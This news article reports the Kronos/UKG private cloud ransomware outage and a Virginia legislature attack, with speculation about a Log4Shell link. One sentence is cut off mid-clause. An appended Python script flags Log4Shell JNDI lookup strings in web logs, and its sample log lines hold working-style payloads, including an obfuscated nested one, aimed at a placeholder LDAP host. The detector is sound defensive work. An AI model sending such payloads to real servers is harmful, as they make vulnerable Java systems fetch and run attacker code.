As Log4Shell wreaks havoc, payroll service reports ransomware attack

As the world is beset by Log4Shell, arguably the most severe vulnerability ever, one of the biggest human resources solutions providers is reporting a ransomware attack that has taken its systems offline, possibly for the next several weeks. So far, the company isn’t saying if that critical vulnerability was the means hackers used to breach the systems.

The company said on Sunday that services using the Kronos Private Cloud had been unavailable for the past day, with the attack taking down Kronos’ UKG Workforce Central, UKG TeleStaff, and Banking Scheduling Solutions services.

“At this time, we still do not have an estimated restoration time, and it is likely that the issue may require at least several days to resolve,” Kronos representative Leo Daley wrote. “We continue to recommend that our impacted customers evaluate alternative plans to process time and attendance data for payroll processing, to manage schedules, and to manage other related operations important to their organization.”

Ten hours after that advisory, Daley published an update reporting that the cause of the outage was ransomware and that it “may take up to several weeks to restore system availability.”

“We deeply regret the impact this is having on you, and we are continuing to take all appropriate actions to remediate the situation,” the Kronos representative wrote. “We recognize the seriousness of this issue and will provide another update within the next 24 hours.”

rely heavily on Java, the software framework that Log4J is based on. The Log4Shell vulnerability, which gives hackers the ability to execute malicious code with elevated system privileges, is trivial to exploit. Often, attacks can come from users visiting a page with a browser that includes plaintext commands in the user agent.
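To check whether a server has logged such requests, the sketch below scans web access logs for Log4j lookup strings in the User-Agent field. It is an added example, not part of the original article; the `${jndi:...}` lookup syntax and its nested forms are not spelled out in the article, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that contains no further "${" and no "}".
INNER = re.compile(r'\$\{((?:(?!\$\{)[^}])*)\}')
# Client address and last quoted field (User-Agent in Combined Log Format).
LINE = re.compile(r'^(\S+) .*"([^"]*)"\s*$')

# Constructed sample access log (documentation addresses, .invalid host).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
198.51.100.4 - - [12/Dec/2021:10:02:11 +0000] "GET /login HTTP/1.1" 200 734 "-" "${${lower:J}ndi:ldap://example.invalid/a}"
"""

def _resolve(match):
    """Approximate what the logger would substitute for a non-JNDI lookup."""
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() in ("lower", "upper"):
        return rest                      # case-changing lookups keep the text
    if ":-" in body:
        return body.split(":-", 1)[1]    # failed lookup falls back to default
    return ""

def contains_jndi_lookup(value, max_rounds=10):
    """True if value holds a JNDI lookup, directly or built from nested lookups."""
    text = unquote(value)                # undo URL-encoding of "${" and "}"
    for _ in range(max_rounds):
        bodies = INNER.findall(text)
        if not bodies:
            return False
        if any(b.strip().lower().startswith("jndi:") for b in bodies):
            return True
        text = INNER.sub(_resolve, text)  # peel one nesting level, then recheck
    return True  # still nesting after max_rounds: flag for manual review

def flagged_clients(log_text):
    """Return (client address, user agent) for each suspicious log line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and contains_jndi_lookup(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

if __name__ == "__main__":
    for ip, agent in flagged_clients(SAMPLE_LOG):
        print(ip, agent)
```

A hit shows that a request carrying a lookup string reached the log, not that the lookup was evaluated; whether the host was affected depends on the Log4j version and configuration behind it.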

Kronos said it had retained cybersecurity experts and has notified authorities. It said customers’ on-premises services aren’t affected.

Separately, the IT arm of the Virginia state legislature reported suffering a ransomware attack that occurred late on Friday, the Associated Press reported. The Legislative Automated Systems in 2019 purchased Java licenses, an indication that the IT group uses the software framework. While it’s unknown what the vector was for the breach, both its timing and the use of Java are consistent with the possibility Log4Shell played a key role.

This post will be updated with any new information that comes to light.

Post updated to add detail about Virginia legislature ransomware attack.
